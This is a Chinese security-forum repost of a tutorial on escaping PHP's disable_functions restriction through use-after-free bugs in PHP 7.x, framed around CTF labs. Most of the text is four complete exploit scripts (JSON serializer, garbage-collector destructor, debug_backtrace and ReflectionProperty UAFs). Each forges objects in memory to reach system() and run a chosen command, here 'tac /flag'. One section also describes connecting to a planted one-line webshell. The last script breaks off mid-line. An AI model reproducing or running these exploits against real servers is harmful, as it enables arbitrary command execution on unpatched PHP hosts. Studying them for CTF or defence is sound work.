设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 干货 | 突破disable_functions限制执行命令·下 ...
返回列表 发新帖
查看: 1042|回复: 0

干货 | 突破disable_functions限制执行命令·下

[复制链接]
Grav1ty

180

主题

231

帖子

1180

积分

金牌会员

Rank: 6Rank: 6

积分
1180
发表于 2022-1-19 00:26:38 | 显示全部楼层 |阅读模式
原文链接:干货 | 突破disable_functions限制执行命令·下

利用UAF漏洞
UAF漏洞(Use-After-Free)是一种内存破坏漏洞,漏洞成因是一块堆内存被释放了之后又被使用。又被使用指的是:指针存在(悬垂指针被引用)。这个引用的结果是不可预测的,因为不知道会发生什么。由于大多数的堆内存其实都是C++对象,所以利用的核心思路就是分配堆去占坑,占的坑中有自己构造的虚表。
悬垂指针:悬垂指针是指一类不指向任何合法的或者有效的(即与指针的含义不符)的对象的指针。比如一个对象的指针,如果这个对象已经被释放或者回收但是指针没有进行任何的修改仍然执行已被释放的内存,这个指针就叫做悬垂指针。
[size=1em]由于本人对PWN这块并不了解,对这些漏洞只是一知半解,所以也仅仅讲如何使用大佬的EXP直接利用了
Json Serializer UAF
漏洞简介
此漏洞利用json序列化程序中的释放后使用漏洞,利用json序列化程序中的堆溢出触发,以绕过disable_functions和执行系统命令。尽管不能保证成功,但它应该相当可靠的在所有服务器 api上使用。
漏洞利用条件
•Linux 操作系统•PHP 版本•7.1 - all versions to date•7.2 < 7.2.19 (released: 30 May 2019)•7.3 < 7.3.6 (released: 30 May 2019)
靶场环境
靶场突破
除了蚁剑的扩展插件,还可以使用国外大佬mm0r1写的EXP:
https://github.com/mm0r1/exploits/tree/master/php-json-bypass
  1. <?php

  3. $cmd = "tac /flag";        // 可替换成需要执行的命令

  5. $n_alloc = 10; # increase this value if you get segfaults

  7. class MySplFixedArray extends SplFixedArray {
  8.     public static $leak;
  9. }

  11. class Z implements JsonSerializable {
  12.     public function write(&$str, $p, $v, $n = 8) {
  13.       $i = 0;
  14.       for($i = 0; $i < $n; $i++) {
  15.         $str[$p + $i] = chr($v & 0xff);
  16.         $v >>= 8;
  17.       }
  18.     }

  20.     public function str2ptr(&$str, $p = 0, $s = 8) {
  21.         $address = 0;
  22.         for($j = $s-1; $j >= 0; $j--) {
  23.             $address <<= 8;
  24.             $address |= ord($str[$p+$j]);
  25.         }
  26.         return $address;
  27.     }

  29.     public function ptr2str($ptr, $m = 8) {
  30.         $out = "";
  31.         for ($i=0; $i < $m; $i++) {
  32.             $out .= chr($ptr & 0xff);
  33.             $ptr >>= 8;
  34.         }
  35.         return $out;
  36.     }

  38.     # unable to leak ro segments
  39.     public function leak1($addr) {
  40.         global $spl1;

  42.         $this->write($this->abc, 8, $addr - 0x10);
  43.         return strlen(get_class($spl1));
  44.     }

  46.     # the real deal
  47.     public function leak2($addr, $p = 0, $s = 8) {
  48.         global $spl1, $fake_tbl_off;

  50.         # fake reference zval
  51.         $this->write($this->abc, $fake_tbl_off + 0x10, 0xdeadbeef); # gc_refcounted
  52.         $this->write($this->abc, $fake_tbl_off + 0x18, $addr + $p - 0x10); # zval
  53.         $this->write($this->abc, $fake_tbl_off + 0x20, 6); # type (string)

  55.         $leak = strlen($spl1::$leak);
  56.         if($s != 8) { $leak %= 2 << ($s * 8) - 1; }

  58.         return $leak;
  59.     }

  61.     public function parse_elf($base) {
  62.         $e_type = $this->leak2($base, 0x10, 2);

  64.         $e_phoff = $this->leak2($base, 0x20);
  65.         $e_phentsize = $this->leak2($base, 0x36, 2);
  66.         $e_phnum = $this->leak2($base, 0x38, 2);

  68.         for($i = 0; $i < $e_phnum; $i++) {
  69.             $header = $base + $e_phoff + $i * $e_phentsize;
  70.             $p_type  = $this->leak2($header, 0, 4);
  71.             $p_flags = $this->leak2($header, 4, 4);
  72.             $p_vaddr = $this->leak2($header, 0x10);
  73.             $p_memsz = $this->leak2($header, 0x28);

  75.             if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
  76.                 # handle pie
  77.                 $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
  78.                 $data_size = $p_memsz;
  79.             } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
  80.                 $text_size = $p_memsz;
  81.             }
  82.         }

  84.         if(!$data_addr || !$text_size || !$data_size)
  85.             return false;

  87.         return [$data_addr, $text_size, $data_size];
  88.     }

  90.     public function get_basic_funcs($base, $elf) {
  91.         list($data_addr, $text_size, $data_size) = $elf;
  92.         for($i = 0; $i < $data_size / 8; $i++) {
  93.             $leak = $this->leak2($data_addr, $i * 8);
  94.             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
  95.                 $deref = $this->leak2($leak);
  96.                 # 'constant' constant check
  97.                 if($deref != 0x746e6174736e6f63)
  98.                     continue;
  99.             } else continue;

  101.             $leak = $this->leak2($data_addr, ($i + 4) * 8);
  102.             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
  103.                 $deref = $this->leak2($leak);
  104.                 # 'bin2hex' constant check
  105.                 if($deref != 0x786568326e6962)
  106.                     continue;
  107.             } else continue;

  109.             return $data_addr + $i * 8;
  110.         }
  111.     }

  113.     public function get_binary_base($binary_leak) {
  114.         $base = 0;
  115.         $start = $binary_leak & 0xfffffffffffff000;
  116.         for($i = 0; $i < 0x1000; $i++) {
  117.             $addr = $start - 0x1000 * $i;
  118.             $leak = $this->leak2($addr, 0, 7);
  119.             if($leak == 0x10102464c457f) { # ELF header
  120.                 return $addr;
  121.             }
  122.         }
  123.     }

  125.     public function get_system($basic_funcs) {
  126.         $addr = $basic_funcs;
  127.         do {
  128.             $f_entry = $this->leak2($addr);
  129.             $f_name = $this->leak2($f_entry, 0, 6);

  131.             if($f_name == 0x6d6574737973) { # system
  132.                 return $this->leak2($addr + 8);
  133.             }
  134.             $addr += 0x20;
  135.         } while($f_entry != 0);
  136.         return false;
  137.     }

  139.     public function jsonSerialize() {
  140.         global $y, $cmd, $spl1, $fake_tbl_off, $n_alloc;

  142.         $contiguous = [];
  143.         for($i = 0; $i < $n_alloc; $i++)
  144.             $contiguous[] = new DateInterval('PT1S');

  146.         $room = [];
  147.         for($i = 0; $i < $n_alloc; $i++)
  148.             $room[] = new Z();

  150.         $_protector = $this->ptr2str(0, 78);

  152.         $this->abc = $this->ptr2str(0, 79);
  153.         $p = new DateInterval('PT1S');

  155.         unset($y[0]);
  156.         unset($p);

  158.         $protector = ".$_protector";

  160.         $x = new DateInterval('PT1S');
  161.         $x->d = 0x2000;
  162.         $x->h = 0xdeadbeef;
  163.         # $this->abc is now of size 0x2000

  165.         if($this->str2ptr($this->abc) != 0xdeadbeef) {
  166.             die('UAF failed.');
  167.         }

  169.         $spl1 = new MySplFixedArray();
  170.         $spl2 = new MySplFixedArray();

  172.         # some leaks
  173.         $class_entry = $this->str2ptr($this->abc, 0x120);
  174.         $handlers = $this->str2ptr($this->abc, 0x128);
  175.         $php_heap = $this->str2ptr($this->abc, 0x1a8);
  176.         $abc_addr = $php_heap - 0x218;

  178.         # create a fake class_entry
  179.         $fake_obj = $abc_addr;
  180.         $this->write($this->abc, 0, 2); # type
  181.         $this->write($this->abc, 0x120, $abc_addr); # fake class_entry

  183.         # copy some of class_entry definition
  184.         for($i = 0; $i < 16; $i++) {
  185.             $this->write($this->abc, 0x10 + $i * 8,
  186.                 $this->leak1($class_entry + 0x10 + $i * 8));
  187.         }

  189.         # fake static members table
  190.         $fake_tbl_off = 0x70 * 4 - 16;
  191.         $this->write($this->abc, 0x30, $abc_addr + $fake_tbl_off);
  192.         $this->write($this->abc, 0x38, $abc_addr + $fake_tbl_off);

  194.         # fake zval_reference
  195.         $this->write($this->abc, $fake_tbl_off, $abc_addr + $fake_tbl_off + 0x10); # zval
  196.         $this->write($this->abc, $fake_tbl_off + 8, 10); # zval type (reference)

  198.         # look for binary base
  199.         $binary_leak = $this->leak2($handlers + 0x10);
  200.         if(!($base = $this->get_binary_base($binary_leak))) {
  201.             die("Couldn't determine binary base address");
  202.         }

  204.         # parse elf header
  205.         if(!($elf = $this->parse_elf($base))) {
  206.             die("Couldn't parse ELF");
  207.         }

  209.         # get basic_functions address
  210.         if(!($basic_funcs = $this->get_basic_funcs($base, $elf))) {
  211.             die("Couldn't get basic_functions address");
  212.         }

  214.         # find system entry
  215.         if(!($zif_system = $this->get_system($basic_funcs))) {
  216.             die("Couldn't get zif_system address");
  217.         }
  218.         
  219.         # copy hashtable offsetGet bucket
  220.         $fake_bkt_off = 0x70 * 5 - 16;

  222.         $function_data = $this->str2ptr($this->abc, 0x50);
  223.         for($i = 0; $i < 4; $i++) {
  224.             $this->write($this->abc, $fake_bkt_off + $i * 8,
  225.                 $this->leak2($function_data + 0x40 * 4, $i * 8));
  226.         }

  228.         # create a fake bucket
  229.         $fake_bkt_addr = $abc_addr + $fake_bkt_off;
  230.         $this->write($this->abc, 0x50, $fake_bkt_addr);
  231.         for($i = 0; $i < 3; $i++) {
  232.             $this->write($this->abc, 0x58 + $i * 4, 1, 4);
  233.         }

  235.         # copy bucket zval
  236.         $function_zval = $this->str2ptr($this->abc, $fake_bkt_off);
  237.         for($i = 0; $i < 12; $i++) {
  238.             $this->write($this->abc,  $fake_bkt_off + 0x70 + $i * 8,
  239.                 $this->leak2($function_zval, $i * 8));
  240.         }

  242.         # pwn
  243.         $this->write($this->abc, $fake_bkt_off + 0x70 + 0x30, $zif_system);
  244.         $this->write($this->abc, $fake_bkt_off, $fake_bkt_addr + 0x70);

  246.         $spl1->offsetGet($cmd);

  248.         exit();
  249.     }
  250. }

  252. $y = [new Z()];
  253. json_encode([&$y]);
复制代码
直接访问即可执行命令。
PHP7 GC with Certain Destructors UAF
漏洞简介
此漏洞利用PHP垃圾收集器(garbage collector)中存在三年的一个 bug,通过PHP垃圾收集器中堆溢出来绕过disable_functions并执行系统命令。
漏洞利用条件
•Linux 操作系统•PHP 版本•7.0 - all versions to date•7.1 - all versions to date•7.2 - all versions to date•7.3 - all versions to date
靶场环境
靶场突破
除了蚁剑的扩展插件,还可以使用国外大佬mm0r1写的EXP:
https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass
  1. <?php

  3. # PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
  4. #
  5. # Bug: https://bugs.php.net/bug.php?id=72530
  6. #
  7. # This exploit should work on all PHP 7.0-7.3 versions
  8. #
  9. # Author: https://github.com/mm0r1

  11. pwn("tac /flag");            // 可替换成需要执行的命令

  13. function pwn($cmd) {
  14.     global $abc, $helper;

  16.     function str2ptr(&$str, $p = 0, $s = 8) {
  17.         $address = 0;
  18.         for($j = $s-1; $j >= 0; $j--) {
  19.             $address <<= 8;
  20.             $address |= ord($str[$p+$j]);
  21.         }
  22.         return $address;
  23.     }

  25.     function ptr2str($ptr, $m = 8) {
  26.         $out = "";
  27.         for ($i=0; $i < $m; $i++) {
  28.             $out .= chr($ptr & 0xff);
  29.             $ptr >>= 8;
  30.         }
  31.         return $out;
  32.     }

  34.     function write(&$str, $p, $v, $n = 8) {
  35.         $i = 0;
  36.         for($i = 0; $i < $n; $i++) {
  37.             $str[$p + $i] = chr($v & 0xff);
  38.             $v >>= 8;
  39.         }
  40.     }

  42.     function leak($addr, $p = 0, $s = 8) {
  43.         global $abc, $helper;
  44.         write($abc, 0x68, $addr + $p - 0x10);
  45.         $leak = strlen($helper->a);
  46.         if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
  47.         return $leak;
  48.     }

  50.     function parse_elf($base) {
  51.         $e_type = leak($base, 0x10, 2);

  53.         $e_phoff = leak($base, 0x20);
  54.         $e_phentsize = leak($base, 0x36, 2);
  55.         $e_phnum = leak($base, 0x38, 2);

  57.         for($i = 0; $i < $e_phnum; $i++) {
  58.             $header = $base + $e_phoff + $i * $e_phentsize;
  59.             $p_type  = leak($header, 0, 4);
  60.             $p_flags = leak($header, 4, 4);
  61.             $p_vaddr = leak($header, 0x10);
  62.             $p_memsz = leak($header, 0x28);

  64.             if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
  65.                 # handle pie
  66.                 $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
  67.                 $data_size = $p_memsz;
  68.             } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
  69.                 $text_size = $p_memsz;
  70.             }
  71.         }

  73.         if(!$data_addr || !$text_size || !$data_size)
  74.             return false;

  76.         return [$data_addr, $text_size, $data_size];
  77.     }

  79.     function get_basic_funcs($base, $elf) {
  80.         list($data_addr, $text_size, $data_size) = $elf;
  81.         for($i = 0; $i < $data_size / 8; $i++) {
  82.             $leak = leak($data_addr, $i * 8);
  83.             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
  84.                 $deref = leak($leak);
  85.                 # 'constant' constant check
  86.                 if($deref != 0x746e6174736e6f63)
  87.                     continue;
  88.             } else continue;

  90.             $leak = leak($data_addr, ($i + 4) * 8);
  91.             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
  92.                 $deref = leak($leak);
  93.                 # 'bin2hex' constant check
  94.                 if($deref != 0x786568326e6962)
  95.                     continue;
  96.             } else continue;

  98.             return $data_addr + $i * 8;
  99.         }
  100.     }

  102.     function get_binary_base($binary_leak) {
  103.         $base = 0;
  104.         $start = $binary_leak & 0xfffffffffffff000;
  105.         for($i = 0; $i < 0x1000; $i++) {
  106.             $addr = $start - 0x1000 * $i;
  107.             $leak = leak($addr, 0, 7);
  108.             if($leak == 0x10102464c457f) { # ELF header
  109.                 return $addr;
  110.             }
  111.         }
  112.     }

  114.     function get_system($basic_funcs) {
  115.         $addr = $basic_funcs;
  116.         do {
  117.             $f_entry = leak($addr);
  118.             $f_name = leak($f_entry, 0, 6);

  120.             if($f_name == 0x6d6574737973) { # system
  121.                 return leak($addr + 8);
  122.             }
  123.             $addr += 0x20;
  124.         } while($f_entry != 0);
  125.         return false;
  126.     }

  128.     class ryat {
  129.         var $ryat;
  130.         var $chtg;
  131.         
  132.         function __destruct()
  133.         {
  134.             $this->chtg = $this->ryat;
  135.             $this->ryat = 1;
  136.         }
  137.     }

  139.     class Helper {
  140.         public $a, $b, $c, $d;
  141.     }

  143.     if(stristr(PHP_OS, 'WIN')) {
  144.         die('This PoC is for *nix systems only.');
  145.     }

  147.     $n_alloc = 10; # increase this value if you get segfaults

  149.     $contiguous = [];
  150.     for($i = 0; $i < $n_alloc; $i++)
  151.         $contiguous[] = str_repeat('A', 79);

  153.     $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
  154.     $out = unserialize($poc);
  155.     gc_collect_cycles();

  157.     $v = [];
  158.     $v[0] = ptr2str(0, 79);
  159.     unset($v);
  160.     $abc = $out[2][0];

  162.     $helper = new Helper;
  163.     $helper->b = function ($x) { };

  165.     if(strlen($abc) == 79 || strlen($abc) == 0) {
  166.         die("UAF failed");
  167.     }

  169.     # leaks
  170.     $closure_handlers = str2ptr($abc, 0);
  171.     $php_heap = str2ptr($abc, 0x58);
  172.     $abc_addr = $php_heap - 0xc8;

  174.     # fake value
  175.     write($abc, 0x60, 2);
  176.     write($abc, 0x70, 6);

  178.     # fake reference
  179.     write($abc, 0x10, $abc_addr + 0x60);
  180.     write($abc, 0x18, 0xa);

  182.     $closure_obj = str2ptr($abc, 0x20);

  184.     $binary_leak = leak($closure_handlers, 8);
  185.     if(!($base = get_binary_base($binary_leak))) {
  186.         die("Couldn't determine binary base address");
  187.     }

  189.     if(!($elf = parse_elf($base))) {
  190.         die("Couldn't parse ELF header");
  191.     }

  193.     if(!($basic_funcs = get_basic_funcs($base, $elf))) {
  194.         die("Couldn't get basic_functions address");
  195.     }

  197.     if(!($zif_system = get_system($basic_funcs))) {
  198.         die("Couldn't get zif_system address");
  199.     }

  201.     # fake closure object
  202.     $fake_obj_offset = 0xd0;
  203.     for($i = 0; $i < 0x110; $i += 8) {
  204.         write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
  205.     }

  207.     # pwn
  208.     write($abc, 0x20, $abc_addr + $fake_obj_offset);
  209.     write($abc, 0xd0 + 0x38, 1, 4); # internal func type
  210.     write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

  212.     ($helper->b)($cmd);

  214.     exit();
  215. }
复制代码
直接访问即可执行命令。
PHP7 Backtrace UAF
漏洞简介
该漏洞利用在debug_backtrace()函数中使用了两年的一个 bug。我们可以诱使它返回对已被破坏的变量的引用,从而导致释放后使用漏洞。
漏洞利用条件
•Linux 操作系统•PHP 版本•7.0 - all versions to date•7.1 - all versions to date•7.2 - all versions to date•7.3 < 7.3.15 (released 20 Feb 2020)•7.4 < 7.4.3 (released 20 Feb 2020)
靶场环境
靶场位置:CTFHub-技能树-Web-Web进阶-PHP-Bypass disable_functions-Backtrace UAF
靶场突破
除了蚁剑的扩展插件,还可以使用国外大佬mm0r1写的EXP:
https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass
  1. <?php

  3. # PHP 7.0-7.4 disable_functions bypass PoC (*nix only)
  4. #
  5. # Bug: https://bugs.php.net/bug.php?id=76047
  6. # debug_backtrace() returns a reference to a variable
  7. # that has been destroyed, causing a UAF vulnerability.
  8. #
  9. # This exploit should work on all PHP 7.0-7.4 versions
  10. # released as of 30/01/2020.
  11. #
  12. # Author: https://github.com/mm0r1

  14. pwn("tac /flag");            // 可替换成需要执行的命令

  16. function pwn($cmd) {
  17.     global $abc, $helper, $backtrace;

  19.     class Vuln {
  20.         public $a;
  21.         public function __destruct() {
  22.             global $backtrace;
  23.             unset($this->a);
  24.             $backtrace = (new Exception)->getTrace(); # ;)
  25.             if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
  26.                 $backtrace = debug_backtrace();
  27.             }
  28.         }
  29.     }

  31.     class Helper {
  32.         public $a, $b, $c, $d;
  33.     }

  35.     function str2ptr(&$str, $p = 0, $s = 8) {
  36.         $address = 0;
  37.         for($j = $s-1; $j >= 0; $j--) {
  38.             $address <<= 8;
  39.             $address |= ord($str[$p+$j]);
  40.         }
  41.         return $address;
  42.     }

  44.     function ptr2str($ptr, $m = 8) {
  45.         $out = "";
  46.         for ($i=0; $i < $m; $i++) {
  47.             $out .= chr($ptr & 0xff);
  48.             $ptr >>= 8;
  49.         }
  50.         return $out;
  51.     }

  53.     function write(&$str, $p, $v, $n = 8) {
  54.         $i = 0;
  55.         for($i = 0; $i < $n; $i++) {
  56.             $str[$p + $i] = chr($v & 0xff);
  57.             $v >>= 8;
  58.         }
  59.     }

  61.     function leak($addr, $p = 0, $s = 8) {
  62.         global $abc, $helper;
  63.         write($abc, 0x68, $addr + $p - 0x10);
  64.         $leak = strlen($helper->a);
  65.         if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
  66.         return $leak;
  67.     }

  69.     function parse_elf($base) {
  70.         $e_type = leak($base, 0x10, 2);

  72.         $e_phoff = leak($base, 0x20);
  73.         $e_phentsize = leak($base, 0x36, 2);
  74.         $e_phnum = leak($base, 0x38, 2);

  76.         for($i = 0; $i < $e_phnum; $i++) {
  77.             $header = $base + $e_phoff + $i * $e_phentsize;
  78.             $p_type  = leak($header, 0, 4);
  79.             $p_flags = leak($header, 4, 4);
  80.             $p_vaddr = leak($header, 0x10);
  81.             $p_memsz = leak($header, 0x28);

  83.             if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
  84.                 # handle pie
  85.                 $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
  86.                 $data_size = $p_memsz;
  87.             } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
  88.                 $text_size = $p_memsz;
  89.             }
  90.         }

  92.         if(!$data_addr || !$text_size || !$data_size)
  93.             return false;

  95.         return [$data_addr, $text_size, $data_size];
  96.     }

  98.     function get_basic_funcs($base, $elf) {
  99.         list($data_addr, $text_size, $data_size) = $elf;
  100.         for($i = 0; $i < $data_size / 8; $i++) {
  101.             $leak = leak($data_addr, $i * 8);
  102.             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
  103.                 $deref = leak($leak);
  104.                 # 'constant' constant check
  105.                 if($deref != 0x746e6174736e6f63)
  106.                     continue;
  107.             } else continue;

  109.             $leak = leak($data_addr, ($i + 4) * 8);
  110.             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
  111.                 $deref = leak($leak);
  112.                 # 'bin2hex' constant check
  113.                 if($deref != 0x786568326e6962)
  114.                     continue;
  115.             } else continue;

  117.             return $data_addr + $i * 8;
  118.         }
  119.     }

  121.     function get_binary_base($binary_leak) {
  122.         $base = 0;
  123.         $start = $binary_leak & 0xfffffffffffff000;
  124.         for($i = 0; $i < 0x1000; $i++) {
  125.             $addr = $start - 0x1000 * $i;
  126.             $leak = leak($addr, 0, 7);
  127.             if($leak == 0x10102464c457f) { # ELF header
  128.                 return $addr;
  129.             }
  130.         }
  131.     }

  133.     function get_system($basic_funcs) {
  134.         $addr = $basic_funcs;
  135.         do {
  136.             $f_entry = leak($addr);
  137.             $f_name = leak($f_entry, 0, 6);

  139.             if($f_name == 0x6d6574737973) { # system
  140.                 return leak($addr + 8);
  141.             }
  142.             $addr += 0x20;
  143.         } while($f_entry != 0);
  144.         return false;
  145.     }

  147.     function trigger_uaf($arg) {
  148.         # str_shuffle prevents opcache string interning
  149.         $arg = str_shuffle(str_repeat('A', 79));
  150.         $vuln = new Vuln();
  151.         $vuln->a = $arg;
  152.     }

  154.     if(stristr(PHP_OS, 'WIN')) {
  155.         die('This PoC is for *nix systems only.');
  156.     }

  158.     $n_alloc = 10; # increase this value if UAF fails
  159.     $contiguous = [];
  160.     for($i = 0; $i < $n_alloc; $i++)
  161.         $contiguous[] = str_shuffle(str_repeat('A', 79));

  163.     trigger_uaf('x');
  164.     $abc = $backtrace[1]['args'][0];

  166.     $helper = new Helper;
  167.     $helper->b = function ($x) { };

  169.     if(strlen($abc) == 79 || strlen($abc) == 0) {
  170.         die("UAF failed");
  171.     }

  173.     # leaks
  174.     $closure_handlers = str2ptr($abc, 0);
  175.     $php_heap = str2ptr($abc, 0x58);
  176.     $abc_addr = $php_heap - 0xc8;

  178.     # fake value
  179.     write($abc, 0x60, 2);
  180.     write($abc, 0x70, 6);

  182.     # fake reference
  183.     write($abc, 0x10, $abc_addr + 0x60);
  184.     write($abc, 0x18, 0xa);

  186.     $closure_obj = str2ptr($abc, 0x20);

  188.     $binary_leak = leak($closure_handlers, 8);
  189.     if(!($base = get_binary_base($binary_leak))) {
  190.         die("Couldn't determine binary base address");
  191.     }

  193.     if(!($elf = parse_elf($base))) {
  194.         die("Couldn't parse ELF header");
  195.     }

  197.     if(!($basic_funcs = get_basic_funcs($base, $elf))) {
  198.         die("Couldn't get basic_functions address");
  199.     }

  201.     if(!($zif_system = get_system($basic_funcs))) {
  202.         die("Couldn't get zif_system address");
  203.     }

  205.     # fake closure object
  206.     $fake_obj_offset = 0xd0;
  207.     for($i = 0; $i < 0x110; $i += 8) {
  208.         write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
  209.     }

  211.     # pwn
  212.     write($abc, 0x20, $abc_addr + $fake_obj_offset);
  213.     write($abc, 0xd0 + 0x38, 1, 4); # internal func type
  214.     write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

  216.     ($helper->b)($cmd);
  217.     exit();
  218. }
复制代码
直接访问即可执行命令。
PHP7 ReflectionProperty UAF
漏洞简介
PHP在创建ReflectionProperty 类之后,使用$rp->getType()->getName() 这个调用指向的是一个已经被 free 的内存地址,便可以触发UAF。
漏洞利用条件
•Linux 操作系统•PHP 版本:7.4 <= 7.4.8
靶场环境
羊城杯CTF-Break_The_Wall:
https://github.com/gwht/2020YCBCTF/blob/main/wp/web/break_the_wall/break_the_wall.tar.gz
靶场突破
访问靶场地址:
十分明显的一个一句话木马,不过要想蚁剑去连接还需要构造一下payload:
但连接后才发现没有任何权限
这就只能对WebShell上进行代码执行,触发UAF了
直接放出官方的EXP,具体的解题思路请查看官方的WP:
  1. <?php
  2. global $abc, $helper;
  3. class Test {
  4. public HelperHelperHelperHelperHelperHelperHelper $prop;
  5. }
  6. class HelperHelperHelperHelperHelperHelperHelper {
  7. public $a, $b;
  8. },
  9. function s2n($str) {
  10. $address = 0;
  11. for ($i=0;$i<4;$i++){
  12. $address <<= 8;
  13. $address |= ord($str[4 + $i]);
  14. }
  15. return $address;
  16. }
  17. function s2b($str, $offset){
  18. return hex2bin(str_pad(dechex(s2n($str) + $offset - 0x10), 8, "0",
  19. STR_PAD_LEFT));
  20. }
  21. function leak($offset) {
  22. global $abc;
  23. $data = "";
  24. for ($i = 0;$i < 8;$i++){
  25. $data .= $abc[$offset + 7 - $i];
  26. }
  27. return $data;
  28. }
  29. function leak2($address) {
  30. global $helper;
  31. write(0x20, $address);
  32. $leak = strlen($helper->b);
  33. $leak = dechex($leak);
  34. $leak = str_pad($leak, 16, "0", STR_PAD_LEFT);
  35. $leak = hex2bin($leak);
  36. return $leak;
  37. }
  38. function write($offset, $data) {
  39. global $abc;
  40. $data = str_pad($data, 8, "\x00", STR_PAD_LEFT);
  41. for ($i = 0;$i < 8;$i++){
  42. $abc[$offset + $i] = $data[7 - $i];
  43. }
  44. }
  45. function get_basic_funcs($std_object_handlers) {
  46. $prefix = substr($std_object_handlers, 0, 4);
  47. $std_object_handlers = hexdec(bin2hex($std_object_handlers));
  48. $start = $std_object_handlers & 0x00000000fffff000 | 0x0000000000000920; # change 0x920 if finding failed
  49. $NumPrefix = $std_object_handlers & 0x0000ffffff000000;
  50. $NumPrefix = $NumPrefix - 0x0000000001000000;
  51. $funcs = get_defined_functions()['internal'];
  52. for($i = 0; $i < 0x1000; $i++) {
  53. $addr = $start - 0x1000 * $i;
  54. $name_addr = bin2hex(leak2($prefix . hex2bin(str_pad(dechex($addr - 0x10), 8,
  55. "0", STR_PAD_LEFT))));
  56. if (hexdec($name_addr) > $std_object_handlers || hexdec($name_addr) < $NumPrefix)
  57. {
  58. continue;
  59. }
  60. $name_addr = str_pad($name_addr, 16, "0", STR_PAD_LEFT);
  61. $name = strrev(leak2($prefix . s2b(hex2bin($name_addr), 0x00)));
  62. $name = explode("\x00", $name)[0];
  63. if(in_array($name, $funcs)) {
  64. return [$name, bin2hex($prefix) . str_pad(dechex($addr), 8, "0", STR_PAD_LEFT),
  65. $std_object_handlers, $NumPrefix];
  66. }
  67. }
  68. }
  69. function getSystem($unknown_func) {
  70. $unknown_addr = hex2bin($unknown_func[1]);
  71. $prefix = substr($unknown_addr, 0, 4);
  72. $unknown_addr = hexdec($unknown_func[1]);
  73. $start = $unknown_addr & 0x00000000ffffffff;
  74. for($i = 0;$i < 0x800;$i++) {
  75. $addr = $start - 0x20 * $i;
  76. $name_addr = bin2hex(leak2($prefix . hex2bin(str_pad(dechex($addr - 0x10), 8,
  77. "0", STR_PAD_LEFT))));
  78. if (hexdec($name_addr) > $unknown_func[2] || hexdec($name_addr) <
  79. $unknown_func[3]) {
  80. continue;
  81. }
  82. $name_addr = str_pad($name_addr, 16, "0", STR_PAD_LEFT);
  83. $name = strrev(leak2($prefix . s2b(hex2bin($name_addr), 0x00)));
  84. if(strstr($name, "system")) {
  85. return bin2hex(leak2($prefix . hex2bin(str_pad(dechex($addr - 0x10 + 0x08), 8,
  86. "0", STR_PAD_LEFT))));
  87. }
  88. }
  89. for($i = 0;$i < 0x800;$i++) {
  90. $addr = $start + 0x20 * $i;
  91. $name_addr = bin2hex(leak2($prefix . hex2bin(str_pad(dechex($addr - 0x10), 8,
  92. "0", STR_PAD_LEFT))));
  93. if (hexdec($name_addr) > $unknown_func[2] || hexdec($name_addr) <
  94. $unknown_func[3]) {
  95. continue;
  96. }
  97. $name_addr = str_pad($name_addr, 16, "0", STR_PAD_LEFT);
  98. $name = strrev(leak2($prefix . s2b(hex2bin($name_addr), 0x00)));
  99. if(strstr($name, "system")) {
  100. return bin2hex(leak2($prefix . hex2bin(str_pad(dechex($addr - 0x10 + 0x08), 8,
  101. "0", STR_PAD_LEFT))));
  102. }
  103. }
  104. }
  105. $rp = new ReflectionProperty(Test::class, 'prop');
  106. $test = new Test;
  107. $test -> prop = new HelperHelperHelperHelperHelperHelperHelper;
  108. $abc = $rp -> getType() -> getName();
  109. $helper = new HelperHelperHelperHelperHelperHelperHelper();
  110. if (strlen($abc) < 1000) {
  111. exit("UAF Failed!");
  112. }
  113. $helper -> a = $helper;
  114. $php_heap = leak(0x10);
  115. $helper -> a = function($x){};
  116. $std_object_handlers = leak(0x0);
  117. $prefix = substr($php_heap, 0, 4);
  118. echo "Helper Object Address: " . bin2hex($php_heap) . "\n";
  119. echo "std_object_handlers Address: " . bin2hex($std_object_handlers) . "\n";
  120. $closure_object = leak(0x10);
  121. echo "Closure Object: " . bin2hex($closure_object) . "\n";
  122. write(0x28, "\x06");
  123. if(!($unknown_func = get_basic_funcs($std_object_handlers))) {
  124. die("Couldn't determine funcs address");
  125. }
  126. echo "Find func's adress: " . $unknown_func[1] . " -> " . $unknown_func[0] . "\n";
  127. if(!($system_address = getSystem($unknown_func))) {
  128. die("Couldn't determine system address");
  129. }
  130. //echo "Find system's handler: " . $system_address . "\n";
  131. for ($i = 0;$i < (0x130 / 0x08);$i++) {
  132. write(0x308 + 0x08 * ($i + 1), leak2($prefix . s2b($closure_object, 0x08 *
  133. $i)));
  134. }
  135. $abc[0x308 + 0x40] = "\x01";
  136. write(0x308 + 0x70, hex2bin($system_address));
  137. write(0x10, $prefix . hex2bin(dechex(s2n($php_heap) + 0x18 + 0x308 + 0x08)));
  138. echo "Fake Closure Object Address: " . bin2hex($prefix .
